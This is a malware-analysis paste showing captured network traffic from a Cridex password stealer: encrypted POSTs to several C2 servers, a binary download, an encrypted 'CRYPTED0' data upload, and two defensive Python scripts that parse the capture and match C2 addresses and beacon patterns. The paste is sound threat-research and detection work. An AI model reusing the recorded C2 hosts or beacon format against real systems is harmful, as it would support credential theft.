
#MalwareMustDie - PD079-BHEK-20121209-3

MalwareMustDie Dec 9th, 2012
===========================
#MalwareMustDie - BHEK2 PD079
Cridex - Password stealer
NETWORK ACTIVITY EVIDENCE
@unixfreaxjp /malware]$ date
Sun Dec  9 21:21:01 JST 2012
===========================

An HTTP/1.1 POST request was sent to 180.235.150.72:8080 with a body of encrypted data (Content-Length 347; the headers end at offset 0xE5 and the 347-byte body runs from there to the end of the dump):

// 192.168.7.84 ---> 180.235.150.72 HTTP/POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1

00000000  50 4f 53 54 20 2f 4e 35  6e 6d 4c 43 41 41 41 2f POST /N5 nmLCAAA/
00000010  4c 78 63 71 4b 41 41 2f  47 4c 6b 4f 56 43 41 41 LxcqKAA/ GLkOVCAA
00000020  41 41 2f 20 48 54 54 50  2f 31 2e 31 0d 0a 41 63 AA/ HTTP /1.1..Ac
00000030  63 65 70 74 3a 20 2a 2f  2a 0d 0a 55 73 65 72 2d cept: */ *..User-
00000040  41 67 65 6e 74 3a 20 4d  6f 7a 69 6c 6c 61 2f 35 Agent: M ozilla/5
00000050  2e 30 20 28 57 69 6e 64  6f 77 73 3b 20 55 3b 20 .0 (Wind ows; U;
00000060  4d 53 49 45 20 37 2e 30  3b 20 57 69 6e 64 6f 77 MSIE 7.0 ; Window
00000070  73 20 4e 54 20 36 2e 30  3b 20 65 6e 2d 55 53 29 s NT 6.0 ; en-US)
00000080  0d 0a 48 6f 73 74 3a 20  31 38 30 2e 32 33 35 2e ..Host:  180.235.
00000090  31 35 30 2e 37 32 3a 38  30 38 30 0d 0a 43 6f 6e 150.72:8 080..Con
000000A0  74 65 6e 74 2d 4c 65 6e  67 74 68 3a 20 33 34 37 tent-Len gth: 347
000000B0  0d 0a 43 6f 6e 6e 65 63  74 69 6f 6e 3a 20 4b 65 ..Connec tion: Ke
000000C0  65 70 2d 41 6c 69 76 65  0d 0a 43 61 63 68 65 2d ep-Alive ..Cache-
000000D0  43 6f 6e 74 72 6f 6c 3a  20 6e 6f 2d 63 61 63 68 Control:  no-cach
000000E0  65 0d 0a 0d 0a                                   e....
000000E5  15 7d 92 25 cf 68 92 5b  ae 96 b0 62 ed 8f 24 fb .}.%.h.[ ...b..$.
000000F5  5b bb 87 19 f4 34 6c d9  95 67 20 a7 fb 66 f3 6c [....4l. .g ..f.l
00000105  3f 25 7a f7 41 b1 67 6a  12 c3 99 5d ea 1a cd b7 ?%z.A.gj ...]....
00000115  cf 67 e6 ca 91 50 f2 2d  ad 89 41 4a d4 65 d7 c7 .g...P.- ..AJ.e..
00000125  d2 32 d7 16 b0 fd 49 c2  52 e6 56 cc 5a 71 1e 50 .2....I. R.V.Zq.P
00000135  9f 0a 76 4d 44 9d 0e 25  ec 0a 5b 53 ba d3 20 0c ..vMD..% ..[S.. .
00000145  08 cb 10 ce 37 dc 2a 12  b5 67 94 1c c7 1e 02 95 ....7.*. .g......
00000155  c8 c8 37 9d 05 90 8a 28  9e 5d 7a 59 a4 d3 1e a4 ..7....( .]zY....
00000165  65 0a 06 8a 9a 27 2c 2e  48 85 25 9b e3 24 05 0b e....',. H.%..$..
00000175  59 36 d2 a2 b2 8e 58 90  ba 2e 64 96 4a 02 85 bc Y6....X. ..d.J...
00000185  95 58 2c e0 b2 d9 1f 62  df c4 a2 b3 3d 7d 6a 65 .X,....b ....=}je
00000195  38 f1 ea 27 36 a6 9a 35  9b 66 32 a2 28 c1 01 56 8..'6..5 .f2.(..V
000001A5  73 c7 7b 23 e7 b2 a7 26  ef c8 8b 64 00 3b 9a a2 s.{#...& ...d.;..
000001B5  da a3 08 ec 91 60 71 9e  99 60 fc 2d 19 9a 0f 54 .....`q. .`.-...T
000001C5  32 25 ed 7d a7 33 dc 7e  db e3 97 a2 69 e9 34 ac 2%.}.3.~ ....i.4.
000001D5  87 47 13 69 71 74 2f b7  cf 07 99 42 14 4f 6c 5b .G.iqt/. ...B.Ol[
000001E5  b3 6c 19 0a ee a0 7a 77  cb d1 a9 ba a5 18 d9 4c .l....zw .......L
000001F5  22 ed 4a ce 00 1e 1d ec  90 80 a4 26 4f 6a 8e cc ".J..... ...&Oj..
00000205  b0 3e 04 2f 9c 73 91 1a  e9 7c 1e 75 17 de c5 f4 .>./.s.. .|.u....
00000215  c3 b8 3a 59 74 98 ca de  6b 56 bc 4f bb ad 74 d7 ..:Yt... kV.O..t.
00000225  1f dd 8a e3 5c 25 ac 15  50 02 41 a0 4a d7 c1 c6 ....\%.. P.A.J...
00000235  52 70 6c 4c 1c 6d 90 12  ac 9d f9                RplL.m.. ...
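Added check, not part of the original paste: a small Python script that reassembles the hexdump above into bytes, parses the HTTP request, and verifies the declared Content-Length against the body actually captured, then measures the body's byte entropy to back the "encrypted data" reading. The dump text is this page's own capture copied inline so the script runs offline; the parser, the header split and the entropy threshold are mine, and the "above 6 bits per byte" cutoff is an assumption rather than anything the paste states.

```python
import math, re
from collections import Counter

# The POST request captured above (this page's data), copied so the script runs offline.
REQUEST_DUMP = r"""
00000000  50 4f 53 54 20 2f 4e 35  6e 6d 4c 43 41 41 41 2f POST /N5 nmLCAAA/
00000010  4c 78 63 71 4b 41 41 2f  47 4c 6b 4f 56 43 41 41 LxcqKAA/ GLkOVCAA
00000020  41 41 2f 20 48 54 54 50  2f 31 2e 31 0d 0a 41 63 AA/ HTTP /1.1..Ac
00000030  63 65 70 74 3a 20 2a 2f  2a 0d 0a 55 73 65 72 2d cept: */ *..User-
00000040  41 67 65 6e 74 3a 20 4d  6f 7a 69 6c 6c 61 2f 35 Agent: M ozilla/5
00000050  2e 30 20 28 57 69 6e 64  6f 77 73 3b 20 55 3b 20 .0 (Wind ows; U;
00000060  4d 53 49 45 20 37 2e 30  3b 20 57 69 6e 64 6f 77 MSIE 7.0 ; Window
00000070  73 20 4e 54 20 36 2e 30  3b 20 65 6e 2d 55 53 29 s NT 6.0 ; en-US)
00000080  0d 0a 48 6f 73 74 3a 20  31 38 30 2e 32 33 35 2e ..Host:  180.235.
00000090  31 35 30 2e 37 32 3a 38  30 38 30 0d 0a 43 6f 6e 150.72:8 080..Con
000000A0  74 65 6e 74 2d 4c 65 6e  67 74 68 3a 20 33 34 37 tent-Len gth: 347
000000B0  0d 0a 43 6f 6e 6e 65 63  74 69 6f 6e 3a 20 4b 65 ..Connec tion: Ke
000000C0  65 70 2d 41 6c 69 76 65  0d 0a 43 61 63 68 65 2d ep-Alive ..Cache-
000000D0  43 6f 6e 74 72 6f 6c 3a  20 6e 6f 2d 63 61 63 68 Control:  no-cach
000000E0  65 0d 0a 0d 0a                                   e....
000000E5  15 7d 92 25 cf 68 92 5b  ae 96 b0 62 ed 8f 24 fb .}.%.h.[ ...b..$.
000000F5  5b bb 87 19 f4 34 6c d9  95 67 20 a7 fb 66 f3 6c [....4l. .g ..f.l
00000105  3f 25 7a f7 41 b1 67 6a  12 c3 99 5d ea 1a cd b7 ?%z.A.gj ...]....
00000115  cf 67 e6 ca 91 50 f2 2d  ad 89 41 4a d4 65 d7 c7 .g...P.- ..AJ.e..
00000125  d2 32 d7 16 b0 fd 49 c2  52 e6 56 cc 5a 71 1e 50 .2....I. R.V.Zq.P
00000135  9f 0a 76 4d 44 9d 0e 25  ec 0a 5b 53 ba d3 20 0c ..vMD..% ..[S.. .
00000145  08 cb 10 ce 37 dc 2a 12  b5 67 94 1c c7 1e 02 95 ....7.*. .g......
00000155  c8 c8 37 9d 05 90 8a 28  9e 5d 7a 59 a4 d3 1e a4 ..7....( .]zY....
00000165  65 0a 06 8a 9a 27 2c 2e  48 85 25 9b e3 24 05 0b e....',. H.%..$..
00000175  59 36 d2 a2 b2 8e 58 90  ba 2e 64 96 4a 02 85 bc Y6....X. ..d.J...
00000185  95 58 2c e0 b2 d9 1f 62  df c4 a2 b3 3d 7d 6a 65 .X,....b ....=}je
00000195  38 f1 ea 27 36 a6 9a 35  9b 66 32 a2 28 c1 01 56 8..'6..5 .f2.(..V
000001A5  73 c7 7b 23 e7 b2 a7 26  ef c8 8b 64 00 3b 9a a2 s.{#...& ...d.;..
000001B5  da a3 08 ec 91 60 71 9e  99 60 fc 2d 19 9a 0f 54 .....`q. .`.-...T
000001C5  32 25 ed 7d a7 33 dc 7e  db e3 97 a2 69 e9 34 ac 2%.}.3.~ ....i.4.
000001D5  87 47 13 69 71 74 2f b7  cf 07 99 42 14 4f 6c 5b .G.iqt/. ...B.Ol[
000001E5  b3 6c 19 0a ee a0 7a 77  cb d1 a9 ba a5 18 d9 4c .l....zw .......L
000001F5  22 ed 4a ce 00 1e 1d ec  90 80 a4 26 4f 6a 8e cc ".J..... ...&Oj..
00000205  b0 3e 04 2f 9c 73 91 1a  e9 7c 1e 75 17 de c5 f4 .>./.s.. .|.u....
00000215  c3 b8 3a 59 74 98 ca de  6b 56 bc 4f bb ad 74 d7 ..:Yt... kV.O..t.
00000225  1f dd 8a e3 5c 25 ac 15  50 02 41 a0 4a d7 c1 c6 ....\%.. P.A.J...
00000235  52 70 6c 4c 1c 6d 90 12  ac 9d f9                RplL.m.. ...
"""

HEX_PAIR = re.compile(r"^[0-9a-fA-F]{2}$")

def hexdump_to_bytes(dump: str) -> bytes:
    """Reassemble an 'offset  16 hex bytes  ascii' dump; offsets must be contiguous."""
    out = bytearray()
    for line in dump.splitlines():
        tokens = line.split()
        if not tokens:
            continue
        if int(tokens[0], 16) != len(out):      # catches a dropped or duplicated line
            raise ValueError(f"dump not contiguous at offset {tokens[0]}")
        for tok in tokens[1:17]:                # at most 16 bytes per line
            if not HEX_PAIR.match(tok):         # first non-hex token starts the ASCII column
                break
            out.append(int(tok, 16))
    return bytes(out)

def parse_http_request(raw: bytes) -> dict:
    """Split an HTTP/1.x request into request line, lower-cased header map and body."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("end of headers not found")
    lines = head.decode("latin-1").split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for h in lines[1:]:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: plaintext sits around 4-5, encrypted or compressed data near 8."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def check_request(dump: str) -> dict:
    """Parse the dump, compare declared vs captured body length, score the body."""
    req = parse_http_request(hexdump_to_bytes(dump))
    req["declared_length"] = int(req["headers"]["content-length"])
    req["actual_length"] = len(req["body"])
    req["complete"] = req["declared_length"] == req["actual_length"]
    req["body_entropy"] = shannon_entropy(req["body"])  # > 6 as "encrypted" is an assumption
    return req
```

Run `check_request(REQUEST_DUMP)`: the Content-Length of 347 matches the 347 bytes captured after the blank line (0xE5 through 0x23F), so the dump holds the whole request rather than a truncated segment, and the body's entropy is far above what plaintext or a form post would give. The contiguity check in hexdump_to_bytes is what makes the length comparison trustworthy; without it a missing dump line would silently shrink the body.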

The server at 180.235.150.72 answered by sending a binary back to the test PC. The response is declared as text/html with chunked transfer encoding (first chunk size f3b), but the chunk contents are opaque binary; the stream runs to offset 0x6DC8C and ends with the zero-length chunk (30 0d 0a 0d 0a):

// 180.235.150.72 ===> 192.168.7.84 TCP [TCP segment of a reassembled PDU]

Server: nginx/1.0.10
Date: Sun, 09 Dec 2012 07:19:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding

00000000  48 54 54 50 2f 31 2e 31  20 32 30 30 20 4f 4b 0d HTTP/1.1  200 OK.
00000010  0a 53 65 72 76 65 72 3a  20 6e 67 69 6e 78 2f 31 .Server:  nginx/1
00000020  2e 30 2e 31 30 0d 0a 44  61 74 65 3a 20 53 75 6e .0.10..D ate: Sun
00000030  2c 20 30 39 20 44 65 63  20 32 30 31 32 20 30 37 , 09 Dec  2012 07
00000040  3a 31 39 3a 30 32 20 47  4d 54 0d 0a 43 6f 6e 74 :19:02 G MT..Cont
00000050  65 6e 74 2d 54 79 70 65  3a 20 74 65 78 74 2f 68 ent-Type : text/h
00000060  74 6d 6c 3b 20 63 68 61  72 73 65 74 3d 55 54 46 tml; cha rset=UTF
00000070  2d 38 0d 0a 54 72 61 6e  73 66 65 72 2d 45 6e 63 -8..Tran sfer-Enc
00000080  6f 64 69 6e 67 3a 20 63  68 75 6e 6b 65 64 0d 0a oding: c hunked..
00000090  43 6f 6e 6e 65 63 74 69  6f 6e 3a 20 6b 65 65 70 Connecti on: keep
000000A0  2d 61 6c 69 76 65 0d 0a  58 2d 50 6f 77 65 72 65 -alive.. X-Powere
000000B0  64 2d 42 79 3a 20 50 48  50 2f 35 2e 33 2e 31 38 d-By: PH P/5.3.18
000000C0  2d 31 7e 64 6f 74 64 65  62 2e 30 0d 0a 56 61 72 -1~dotde b.0..Var
000000D0  79 3a 20 41 63 63 65 70  74 2d 45 6e 63 6f 64 69 y: Accep t-Encodi
000000E0  6e 67 0d 0a 0d 0a 66 33  62 0d 0a bb aa ef 6f 93 ng....f3 b.....o.
000000F0  90 d7 73 f7 37 87 c1 c0  79 61 6f 30 b5 fb 96 65 ..s.7... yao0...e
00000100  c0 cf 78 a3 b6 7e b1 87  29 30 90 a5 5f 09 fc d5 ..x..~.. )0.._...
00000110  fd ca a6 f1 88 4d 29 a7  48 dc 28 f7 42 83 c2 1b .....M). H.(.B...
00000120  99 7b dd ca a6 a3 b0 87  74 5c 72 2f f6 3e c2 28 .{...... t\r/.>.(
    :                :
    :                :
0006DC14  fb b5 0b 98 5d d8 bd b1  69 8c 26 79 a1 d5 2c b6 ....]... i.&y..,.
0006DC24  57 55 f0 ee cd 5b 42 4a  13 4e 3e 5f 92 5e 17 4e WU...[BJ .N>_.^.N
0006DC34  dd b5 64 90 d4 4e a8 b0  36 03 f1 de 58 a9 d3 69 ..d..N.. 6...X..i
0006DC44  1c ef 59 f2 20 33 18 24  a6 74 42 23 04 14 19 c9 ..Y. 3.$ .tB#....
0006DC54  92 f4 88 1e e9 68 05 1d  6b e2 b8 e3 3f f4 ea 85 .....h.. k...?...
0006DC64  84 2f 81 7d c8 6e 96 a5  9a 88 7a c2 72 ee d7 2f ./.}.n.. ..z.r../
0006DC74  45 6c 0d eb 0a f3 7b c2  21 68 1b d0 01 2e 70 45 El....{. !h....pE
0006DC84  8e 0d 0a 30 0d 0a 0d 0a                          ...0....

The sample made more than three attempts to open a TCP connection to remote IP 132.248.49.112 on port 8080; each SYN was answered with RST/ACK, so nothing was listening there at capture time. (Wireshark shows the ports by service name: http-alt is 8080, and netarx and optima-vnet are the client's ephemeral ports 1040 and 1051.)
192.168.7.84 ===> 132.248.49.112 TCP    netarx > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
132.248.49.112 => 192.168.7.84   TCP http-alt > netarx [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

It also tried to connect to remote IP 113.130.65.77 on port 8080, with the same result:
192.168.7.84 ===> 113.130.65.77 TCP     optima-vnet > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
113.130.65.77 ==> 192.168.7.84  TCP     http-alt > optima-vnet [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

Then it communicates over plain HTTP with 203.113.98.131:80. This channel looks different from the port-8080 traffic: an HTTP/1.0 POST with another User-Agent, Content-Type application/octet-stream, and a body that starts with the marker CRYPTED0, which the server acknowledges with STATUS-IMPORT-OK:
192.168.7.84 ===> 203.113.98.131 HTTP   POST /asp/intro.php HTTP/1.0
Request sent:
--------------
POST /asp/intro.php HTTP/1.0
Host: 203.113.98.131
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 251
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
CRYPTED0...DK.V..aa..c.....PI%.^D.|2.s;.p..T=....*.........
MX.../......../.;(.dl7).c..).......Jk.rO..e....!].......|.ej
......6.H.y4J_.......f2...8..P.V.....oy.....$...6.z.8.. .0..
.1..H,.....nCa.Z.....?I...r.q-.........7f[......O....vX0-.&.
-D.D5.......

Response received:
-------------------
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 09 Dec 2012 07:21:47 GMT
Content-Type: text/html; charset=windows-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 16

STATUS-IMPORT-OK


Then it also connects to remote IP 173.224.221.135:8080 and sends the same POST (same path and User-Agent) twice, with the following recorded communication; both requests are answered with 165 bytes of opaque data:

192.168.7.84    173.224.221.135 HTTP POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1

POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 173.224.221.135:8080
Content-Length: 408
Connection: Keep-Alive
Cache-Control: no-cache
..c....S..l.........r.......6.l{IMs6.....S......uOKvE...u..}Q?&UM..j..`...%=W+3.........
.r......e..md.h.%.O...0]fr......M.M.....o..P.cm& ......[.(j.hW....M. Y..Y....)eL.....u..q
@..>.1.y..k.A=.!.....hZ.[...........ln..~..`M..>......|t."S..Y.o-fx.......
4..Bv...
.+.}}..2C.&....VSmZO...g6..=?P.6......,6'_T.J
.\..!GZ.7..#..........:F.r...e
.........."..tPWJs... ....+.".U....f&#..!."..0.8|s?.LNp.}......D.tI.0.

HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 09 Dec 2012 07:22:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165
..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
.N%9M.k.......?...Z....|..=6.U...3o.h...F...5
.=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
2U...`......hJ....^.<..
e....

POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 173.224.221.135:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache
B..L.l.............qe..x..p
e.,-........4.q...1X..|..........O...rP.5cO<.B./...q.......%...T..........
^.H...J.n.N.l0.s ..d..w}E.....]....B'..Qt..k..Qu.....J"z........Y...:.....u.....jL.
....#|......=...$..*.*..z......x......zd..y@+4..+./
..*...|N..aZY.@)...}...r6..^y.N0{..7.<c.=) ._..V..5:...g........f........~=...R..pZ....v=d..!.......p.......
$=...q..:#....c.N..]...w..kA....R.P}U[5.

HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 09 Dec 2012 07:22:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165
..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
.N%9M.k.......?...Z....|..=6.U...3o.h...F...5
.=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
2U...`......Qh......>&.......


It then sends the same POST to 206.176.226.157:8080 as follows. The 165-byte reply again begins with the same bytes as the replies from 173.224.221.135, and all three port-8080 hosts report the same nginx/1.0.10 and PHP/5.3.18-1~dotdeb.0 versions, consistent with one backend behind several addresses:
192.168.7.84 ===>206.176.226.157        HTTP    POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 206.176.226.157:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache
o...C.G..rj.....X.......M.2.X;..c2.f...~.....9.6..x..=d..K.p...8.b.J.H.. ?.S..F.:8.g....3l..J..f....Ww....ng...~
..7FS..~P...vlB....]....B'..Qt..k....\..e6..........]...M...O..$.\U..<
....:P...GO.W.Uv.A(.l.............*.s.$....*O......su..G....d.;m.J]A.........!...+...
(mF.I....-
..$. .;....WS..rj.nH:.\.V.5.Z...
..z..........V.......8.....6.+h...Ju.4;....)#h..D.$=.).....3.:\q.r^.5...L

HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 09 Dec 2012 07:23:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165
..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
.N%9M.k.......?...Z....|..=6.U...3o.h...F...5
.=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
2U...`........X..a%..........
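A detection pass over the traffic recorded in this paste, added here as an example and not MalwareMustDie's own tooling. It turns what the capture shows into three checks: the addresses the sample contacted or tried to contact, the shape of the port-8080 beacon (three alphanumeric path segments, the fixed User-Agent string, a POST), and the CRYPTED0 upload to /asp/intro.php answered by STATUS-IMPORT-OK. The pipe-separated log format, the two control lines (RFC 5737 test addresses) and the 5-16 character bounds in the path regex are my assumptions; the IPs, paths, User-Agents and markers are taken from the capture above.

```python
import re

# Addresses this paste records the sample contacting or trying to contact.
C2_IOCS = {
    "180.235.150.72", "173.224.221.135", "206.176.226.157",   # answered the POST on 8080
    "132.248.49.112", "113.130.65.77",                         # SYN met with RST/ACK on 8080
    "203.113.98.131",                                          # /asp/intro.php on port 80
}
CRIDEX_UA = "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)"
# Three alphanumeric path segments and a trailing slash, as in /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/.
# The 5-16 length bounds are an assumption generalizing the single path seen in this capture.
CRIDEX_PATH = re.compile(r"^/[A-Za-z0-9]{5,16}/[A-Za-z0-9]{5,16}/[A-Za-z0-9]{5,16}/$")

FIELDS = ("src", "dst", "dport", "method", "uri", "ua", "body", "resp")

def parse_line(line: str) -> dict:
    """One record of the constructed pipe-separated log format (fields as in FIELDS)."""
    parts = line.rstrip("\n").split("|")
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}: {line!r}")
    rec = dict(zip(FIELDS, parts))
    rec["dport"] = int(rec["dport"])
    return rec

def classify(rec: dict) -> list:
    """Detection tags that fire on one HTTP transaction."""
    tags = []
    if rec["dst"] in C2_IOCS:                      # weakest signal: C2 hosts rotate
        tags.append("known-c2-ip")
    if (rec["method"] == "POST" and rec["dport"] == 8080
            and CRIDEX_PATH.match(rec["uri"]) and rec["ua"] == CRIDEX_UA):
        tags.append("cridex-c2-post")             # shape of the beacon, host-independent
    if rec["method"] == "POST" and rec["body"].startswith("CRYPTED0"):
        tags.append("crypted0-upload")            # marker at the start of the intro.php body
    if rec["resp"].strip() == "STATUS-IMPORT-OK":
        tags.append("status-import-ok")           # server-side acknowledgement of the upload
    return tags

def scan(log: str) -> list:
    """Run every rule over every record; return (dst, uri, tags) for records that fire."""
    hits = []
    for line in log.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        rec = parse_line(line)
        tags = classify(rec)
        if tags:
            hits.append((rec["dst"], rec["uri"], tags))
    return hits

# Constructed log: the four transactions recorded in this paste, plus two controls
# (an ordinary browser GET on 8080 and a look-alike beacon to a host not on the IOC list).
SAMPLE_LOG = f"""\
# src|dst|dport|method|uri|user-agent|body-prefix|response-body
192.168.7.84|180.235.150.72|8080|POST|/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/|{CRIDEX_UA}|<opaque>|<opaque>
192.168.7.84|203.113.98.131|80|POST|/asp/intro.php|Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)|CRYPTED0|STATUS-IMPORT-OK
192.168.7.84|173.224.221.135|8080|POST|/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/|{CRIDEX_UA}|<opaque>|<opaque>
192.168.7.84|206.176.226.157|8080|POST|/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/|{CRIDEX_UA}|<opaque>|<opaque>
192.168.7.84|198.51.100.10|8080|GET|/index.html|Mozilla/5.0 (Windows NT 6.1) Chrome/23.0|-|<html>
192.168.7.84|198.51.100.20|8080|POST|/Ab12cdEFG/ZyXwVut/Qq9Pp8Oo7Nn/|{CRIDEX_UA}|<opaque>|<opaque>
"""

if __name__ == "__main__":
    for dst, uri, tags in scan(SAMPLE_LOG):
        print(f"{dst:16} {uri:34} {', '.join(tags)}")
```

The look-alike control line is the point of the path/User-Agent rule: it fires on the beacon's shape even when the destination is not on the IP list, while the browser GET on the same port stays silent. The IP set is still worth keeping as a separate tag, because two of its members never completed a handshake here and would not show up in HTTP logs at all; they belong in firewall or flow-log matching instead.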
----
#MalwareMustDie!!!!